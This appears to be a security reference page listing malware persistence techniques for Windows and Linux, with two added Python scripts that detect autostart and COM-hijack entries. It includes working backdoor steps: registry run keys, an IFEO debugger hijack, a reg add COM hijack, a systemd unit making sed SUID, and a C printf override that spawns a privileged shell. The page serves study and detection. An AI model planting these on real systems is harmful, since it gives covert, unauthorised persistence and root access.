Last changed: 09.11.2018
Malware Persistence
Windows
Below I list a selection of the most prevalent persistence methods found in malware. A huge collection of persistence methods can be found on http://www.hexacorn.com/blog/2017/01/28/beyond-good-ol-run-key-all-parts/.
run keys (admin privileges)
Create a value my_program REG_SZ 'evil.exe' in one of
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Writing below HKEY_LOCAL_MACHINE needs administrative rights. A RunOnce value is deleted before its command is started, so it gives a single execution only.
run keys (user privileges)
Create a value my_program REG_SZ 'evil.exe' in one of
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
or a value Run REG_SZ 'evil.exe' (a value Load in the same key works the same way) in
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
These need no elevated rights but only fire when that particular user logs on.
startup folder
copy evil.exe "%allusersprofile%\microsoft\windows\start menu\programs\startup\"
copy evil.exe "%appdata%\microsoft\windows\start menu\programs\startup\"
$s=(New-Object -COM WScript.Shell);$lnk=$s.CreateShortcut([environment]::getfolderpath("startup")+"\start.lnk");$lnk.targetpath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe";$lnk.arguments="start-process -filepath c:\windows\system32\calc.exe";$lnk.save()
logon scripts
Create a value UserInitMprLogonScript REG_SZ holding the path of the script in
HKEY_LOCAL_MACHINE\Environment
or
HKEY_CURRENT_USER\Environment
The script is executed by userinit.exe during logon.
custom shell
Create a value Shell in
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
or
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
The default is explorer.exe. Because the value replaces the shell, the malware has to start explorer.exe itself, otherwise the user gets no desktop and notices immediately. A comma-separated list such as 'explorer.exe, evil.exe' is accepted as well.
authentication packages
Add 'mydll.dll' to the REG_MULTI_SZ value Authentication Packages (default msv1_0) or Security Packages in
HKLM\SYSTEM\CurrentControlSet\Control\Lsa
The DLL is loaded into lsass.exe at boot; keep the existing entries or authentication breaks. Writing the key needs administrative rights, and with LSA protection (RunAsPPL) enabled only signed DLLs are loaded.
dll load order
If a program imports functions from a DLL which is neither in the program folder nor listed in
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\KnownDLLs
a malicious DLL with the same file name placed in the program folder will be loaded instead, because the application directory is searched before the system directories. Known DLLs are always taken from System32 and cannot be hijacked this way. The malicious DLL has to export (or forward) the imported functions, otherwise the program fails to start.
AppInit_DLLs
DLLs specified in the value AppInit_DLLs of
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows
are loaded by user32.dll into every process that loads user32.dll (32-bit processes on 64-bit Windows read the same key below Wow6432Node).
Create a value AppInit_DLLs REG_EXPAND_SZ 'mydll.dll' (several DLLs are separated by spaces or commas) and make sure the DWORD LoadAppInit_DLLs in the same key is 1. On Windows 8 and later with Secure Boot enabled the mechanism is disabled entirely.
AppCertDlls
All applications calling CreateProcess (and the related CreateProcessAsUser, CreateProcessWithLogonW and CreateProcessWithTokenW) load the DLLs listed in the key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls
The key does not exist by default and has to be created. Create a value my_dll REG_EXPAND_SZ 'mydll.dll'; the DLL should export CreateProcessNotify, which is called for every process creation.
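As an added example (not code from the original page), the following Python script reads the registry locations from the run keys down to AppCertDlls and the LSA packages and flags entries that look like persistence: programs under user-writable paths, script hosts, encoded PowerShell command lines, and single-value locations such as Shell or Authentication Packages that differ from their defaults. The baseline values, the indicator patterns and the SAMPLE entries are my assumptions; winreg exists only on Windows, so on other systems the classifier runs over the constructed sample instead of the live registry.

```python
"""Audit the Windows autostart registry locations listed on this page and flag
entries that look like malware persistence.  Added example, not code from the
original page.  Standard library only; winreg exists on Windows alone."""
import re
import sys

try:
    import winreg
except ImportError:                   # not Windows: classifier runs on SAMPLE
    winreg = None

# (hive, subkey, value names to read; None = every value in the key)
LOCATIONS = [
    ("HKLM", r"Software\Microsoft\Windows\CurrentVersion\Run", None),
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\Run", None),
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\RunOnce", None),
    ("HKCU", r"Software\Microsoft\Windows NT\CurrentVersion\Windows", ["Run", "Load"]),
    ("HKCU", r"Environment", ["UserInitMprLogonScript"]),
    ("HKLM", r"Software\Microsoft\Windows NT\CurrentVersion\Winlogon", ["Shell", "Userinit"]),
    ("HKCU", r"Software\Microsoft\Windows NT\CurrentVersion\Winlogon", ["Shell"]),
    ("HKLM", r"Software\Microsoft\Windows NT\CurrentVersion\Windows", ["AppInit_DLLs"]),
    ("HKLM", r"SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDlls", None),
    ("HKLM", r"SYSTEM\CurrentControlSet\Control\Lsa", ["Authentication Packages", "Security Packages"]),
]
# assumed clean contents of the single-value locations (empty = should not be set)
BASELINE = {
    "Shell": "explorer.exe",
    "Userinit": r"c:\windows\system32\userinit.exe,",
    "Authentication Packages": "msv1_0",
    "AppInit_DLLs": "",
    "UserInitMprLogonScript": "",
}
# heuristics (assumptions): user-writable paths, script hosts, encoded PowerShell
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData|Downloads)\\", re.I)
SCRIPT_HOST = re.compile(r"\b(powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32|certutil)(\.exe)?\b", re.I)
ENCODED = re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)

def collect_registry():
    """Read the configured values from the live registry; [] when not on Windows."""
    if winreg is None:
        return []
    hives = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}
    entries = []
    for hive, path, wanted in LOCATIONS:
        try:
            key = winreg.OpenKey(hives[hive], path)
        except OSError:                # key absent (AppCertDlls by default) or no access
            continue
        with key:
            index = 0
            while True:
                try:
                    name, data, _type = winreg.EnumValue(key, index)
                except OSError:        # no more values
                    break
                index += 1
                if wanted is None or name in wanted:
                    entries.append((hive + "\\" + path, name, data))
    return entries

def triage(entry):
    """Return the reasons an entry looks suspicious (empty list = nothing obvious)."""
    location, name, data = entry
    if isinstance(data, list):         # REG_MULTI_SZ arrives as a list of strings
        data = " ".join(data)
    data = str(data)
    reasons = []
    if name in BASELINE and data.strip().lower() != BASELINE[name].lower():
        reasons.append("%s differs from default" % name)
    if location.endswith("AppCertDlls"):
        reasons.append("AppCertDlls entry present")
    if USER_WRITABLE.search(data):
        reasons.append("program in a user-writable directory")
    if SCRIPT_HOST.search(data):
        reasons.append("script host / LOLBin as autostart")
    if ENCODED.search(data):
        reasons.append("encoded PowerShell command line")
    return reasons

def audit(entries):
    """Keep only the suspicious entries: [(location, name, data, reasons)]."""
    return [(loc, name, data, triage((loc, name, data)))
            for loc, name, data in entries if triage((loc, name, data))]

SAMPLE = [  # constructed entries for demonstration, not taken from a real host
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r'"C:\Windows\system32\SecurityHealthSystray.exe"'),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "my_program",
     r'"C:\Users\bob\AppData\Roaming\evil.exe"'),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce", "upd",
     "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBi"),
    (r"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell",
     r"explorer.exe, C:\ProgramData\evil.exe"),
    (r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa", "Authentication Packages",
     ["msv1_0", "mydll.dll"]),
]

if __name__ == "__main__":
    findings = audit(collect_registry() or SAMPLE)
    for location, name, data, reasons in findings:
        print("%s\\%s = %r\n    -> %s" % (location, name, data, "; ".join(reasons)))
    sys.exit(1 if findings else 0)
```

Run it elevated so that the HKLM keys (AppCertDlls, Lsa) can be read. A hit is a starting point for triage, not a verdict: the patterns are deliberately simple and cover only the locations on this page, whereas Sysinternals Autoruns enumerates far more.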
AppPath
Affects all applications that resolve a program name through ShellExecute (the Run dialog included).
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
A subkey cmd.exe with the value (Default) REG_SZ 'c:\evil.exe' makes evil.exe run whenever an affected application asks to execute cmd.exe by name.
Image File Execution Options
Create a value Debugger REG_SZ with your command under
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable>
where <executable> is the file name only (e.g. notepad.exe). Your command is started instead of the program, with the original command line appended, so it has to launch the original itself if the program should keep working. The classic sethc.exe/utilman.exe backdoor on the logon screen is set up the same way.
print spooler
spoolsv.exe loads the libraries configured in
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors
Create your own subkey and there add a value Driver REG_SZ 'c:\mydll.dll'.
Alternatively create your own subkey under
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors
and there add a value Driver REG_SZ 'mydll.dll'. In this case your DLL has to be in the folder C:\Windows\System32\spool\prtprocs\x64\.
Both are loaded by the spooler service, which runs as SYSTEM, when it (re)starts; writing these keys needs administrative rights.
services
To create a service from the command line see the pentesting commands for windows.
Installed services can be found in the key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
A service can also be hosted in svchost.exe by adding its name to the corresponding group in
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SVCHOST\
In this case the service needs a Parameters subkey containing the value ServiceDll, and the associated DLL needs to export ServiceMain.
As drivers are installed as a service with type= kernel, rootkits can be found here as well.
scheduled tasks
The command to create a scheduled task from the command line can also be found in the pentesting commands for windows.
The task is run by the Task Scheduler service (Schedule). Task definitions are stored as XML files below C:\Windows\System32\Tasks and mirrored in the registry under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache, which is where a task hidden from the GUI can still be found.
COM hijacking
Create or replace the InprocServer32 key of a COM object with the malicious DLL. HKEY_CURRENT_USER\Software\Classes is merged in front of HKEY_LOCAL_MACHINE when HKEY_CLASSES_ROOT is built, so a per-user entry shadows the machine-wide registration without administrative rights (elevated processes ignore per-user COM registrations, though).
reg add HKCU\Software\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InprocServer32 /ve /t REG_SZ /d c:\path\to\mydll.dll /f
Look at https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/ and https://attackiq.com/2020/03/26/component-object-model-hijacking/ for a nice summary.
Sometimes there are scheduled tasks calling COM objects (a ComHandler action), which makes such a task a convenient trigger for a hijacked CLSID. Those with an enabled trigger that run as Users can be found with powershell.
Get-ScheduledTask | foreach-object {if ($_.Actions.ClassID -ne $null -and $_.Triggers.Enabled -eq $true -and $_.Principal.GroupID -eq "Users"){write-host $_.TaskName;write-host $_.TaskPath;write-host $_.Actions.ClassId;write-host}}
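The detection side of the technique above, as an added example that is not part of the original page: per-user (HKCU\Software\Classes) InprocServer32 registrations whose DLL differs from the machine-wide (HKLM) entry for the same CLSID. The CLSID from the reg add line above is reused in a constructed sample; winreg is Windows-only, so elsewhere only the comparison runs.

```python
"""Find per-user COM registrations that shadow machine-wide ones.
Added example, not code from the original page.  Standard library only."""
try:
    import winreg                 # Windows only
except ImportError:               # elsewhere: find_hijacks() runs on the sample
    winreg = None

CLSID_PATH = r"Software\Classes\CLSID"

def read_inproc_servers(hive):
    """Return {CLSID: InprocServer32 DLL path} for one hive (Windows only).
    hive is winreg.HKEY_CURRENT_USER or winreg.HKEY_LOCAL_MACHINE."""
    servers = {}
    if winreg is None:
        return servers
    try:
        root = winreg.OpenKey(hive, CLSID_PATH)
    except OSError:
        return servers
    with root:
        index = 0
        while True:
            try:
                clsid = winreg.EnumKey(root, index)
            except OSError:       # no more subkeys
                break
            index += 1
            try:
                with winreg.OpenKey(root, clsid + r"\InprocServer32") as key:
                    servers[clsid.upper()] = winreg.QueryValue(key, None)  # (Default) value
            except OSError:       # this CLSID has no in-process server
                continue
    return servers

def find_hijacks(user_servers, machine_servers):
    """Return [(clsid, user_dll, machine_dll)] for CLSIDs whose HKCU InprocServer32
    differs from the HKLM one.  HKCU\\Software\\Classes is consulted before HKLM when
    HKEY_CLASSES_ROOT is built, so these entries win for the interactive user."""
    hijacks = []
    for clsid, user_dll in user_servers.items():
        machine_dll = machine_servers.get(clsid)
        if machine_dll is not None and machine_dll.lower() != user_dll.lower():
            hijacks.append((clsid, user_dll, machine_dll))
    return hijacks

# constructed sample: one shadowed CLSID (the one used on this page), one honest
# per-user registration pointing at the same DLL, one per-user-only registration
SAMPLE_HKCU = {
    "{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}": r"C:\Users\bob\AppData\Roaming\mydll.dll",
    "{00000000-0000-0000-0000-000000000002}": r"C:\Program Files\Vendor\good.dll",
    "{00000000-0000-0000-0000-000000000003}": r"C:\Users\bob\AppData\Local\App\app.dll",
}
SAMPLE_HKLM = {
    "{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}": r"C:\Windows\System32\legit.dll",
    "{00000000-0000-0000-0000-000000000002}": r"C:\Program Files\Vendor\good.dll",
}

if __name__ == "__main__":
    if winreg is not None:
        user = read_inproc_servers(winreg.HKEY_CURRENT_USER)
        machine = read_inproc_servers(winreg.HKEY_LOCAL_MACHINE)
    else:
        user, machine = SAMPLE_HKCU, SAMPLE_HKLM
    for clsid, user_dll, machine_dll in find_hijacks(user, machine):
        print("%s\n    HKCU: %s\n    HKLM: %s" % (clsid, user_dll, machine_dll))
```

Entries that exist only in HKCU are mostly per-user installs and are not reported; they are the next place to look if the list is empty. Elevated (UAC) processes ignore per-user COM registrations, so a hijack planted this way only fires in medium-integrity processes.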
WMI persistence
See https://github.com/n0pe-sled/WMI-Persistence/blob/master/WMI-Persistence.ps1 for powershell scripts which create and show WMI persistence.
Linux
rc files
/etc/profile
/etc/bash.bashrc
~/.profile
~/.bashrc
cron and anacron
Every user can create their own jobs with crontab. The jobs are stored in a file with the name of the user in the folder /var/spool/cron/crontabs/ (/var/spool/cron/ on Red Hat based systems).
echo '* * * * * /usr/bin/wall hello' | crontab -
Note that crontab - replaces the user's entire crontab; print the existing one with crontab -l first if it should be kept.
As root, system wide jobs can be stored in /etc/crontab or in a crontab-like file in /etc/cron.d (both carry an additional user field between the schedule and the command). Alternatively an executable can be put into one of the folders /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly or /etc/cron.monthly.
If anacron is installed it will do the daily, weekly and monthly jobs instead of cron to ensure execution of jobs which were missed due to system downtime. Jobs specifically for anacron can also be put in the file /etc/anacrontab.
systemd services
Services in systemd are configured in unit files. To show the paths where systemd looks for unit files run
systemctl show --property=UnitPath | cat
To view the content of a unit file use the command
systemctl cat <name>.service
Unit files can be created manually with a text editor (e.g. in /etc/systemd/system/) or by running
systemctl edit --force --full example.service
example.service
[Unit]
Description=Set suid bit on sed
[Service]
Type=oneshot
ExecStart=/bin/sh -c 'chmod 4755 "$(command -v sed)"'
[Install]
WantedBy=multi-user.target
ExecStart= takes no shell syntax, so backticks or $(...) only work when the line explicitly invokes a shell, and the first word should be the absolute path of the executable.
Services are started automatically if their corresponding target is reached (comparable to SysV runlevels). To show the current targets use
systemctl list-units --type=target
systemctl get-default
To link a service to a certain target put a symlink in the folder
/etc/systemd/system/<my_target>.target.wants/
or enable the service with
systemctl enable example.service
systemd timers
Systemd offers its own method of scheduling jobs called timers. Existing timers can be shown by running
systemctl list-timers
Timers consist of a timer unit file and a matching service unit file of the same name. When a service is started by a timer it does not need the [Install] section; the timer is the unit that gets enabled with systemctl enable.
example.timer
[Unit]
Description=Run example.service weekly
[Timer]
OnCalendar=weekly
Persistent=true
[Install]
WantedBy=timers.target
Persistent=true makes the job run at the next boot if the scheduled time was missed, like anacron does for cron.
LD_PRELOAD
To load a library into every newly created process the environment variable LD_PRELOAD can be used.
#include <stdio.h>
/* constructor: runs before main() of every program the library is preloaded into */
void __attribute__ ((constructor)) init(void){
printf("Press any key...");
int c = getchar();
(void)c;
}
Compile and test this behavior with
gcc -fPIC -shared -o lib.so lib.c
LD_PRELOAD=$PWD/lib.so ls
To make this change permanent the export can be written into one of the rc files or the path to the library can be put into /etc/ld.so.preload.
The dynamic loader ignores LD_PRELOAD for set-user-ID binaries (secure-execution mode), but /etc/ld.so.preload is applied to those as well, which makes it both more powerful and more dangerous: a broken library there breaks every dynamically linked program on the system, including the shell needed to repair it.
runpath
If you can write to the runpath of a binary (DT_RUNPATH/DT_RPATH, shown by readelf -d) or to a directory listed in /etc/ld.so.conf* you can put a library there. Because these locations are trusted by the loader, this should even work with SUID binaries, for which LD_PRELOAD and LD_LIBRARY_PATH are ignored. The library has to carry the file name of one of the libraries the binary needs (ldd lists them) and has to be loaded before libc for the printf override below to win the symbol lookup.
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
/* replaces printf: the first printf() call of a SUID binary drops into a shell
 * after the elevated effective uid has been made the real uid as well */
int printf(const char *format, ... ){
uid_t uid, euid, new_uid;
uid = getuid();
euid = geteuid();
setreuid(euid, euid);   /* keep the privileges in the spawned shell */
new_uid = getuid();
if (new_uid != uid)     /* only if we actually gained privileges */
system("/bin/sh");
return 0;
}
networking hooks
Depending on the networking client different methods exist to automatically run a script when a connection is established.
/etc/network/if-up.d/ (ifupdown)
/etc/NetworkManager/dispatcher.d/ (NetworkManager; scripts have to be executable, owned by root and not writable by others, otherwise they are ignored)
kernel drivers
If the malware is a kernel rootkit it can be configured as a module to be loaded at boot. Depending on your distribution this could be done in the following locations.
/etc/modules
/etc/modules.conf
/etc/sysconfig/modules/
/etc/modules-load.d/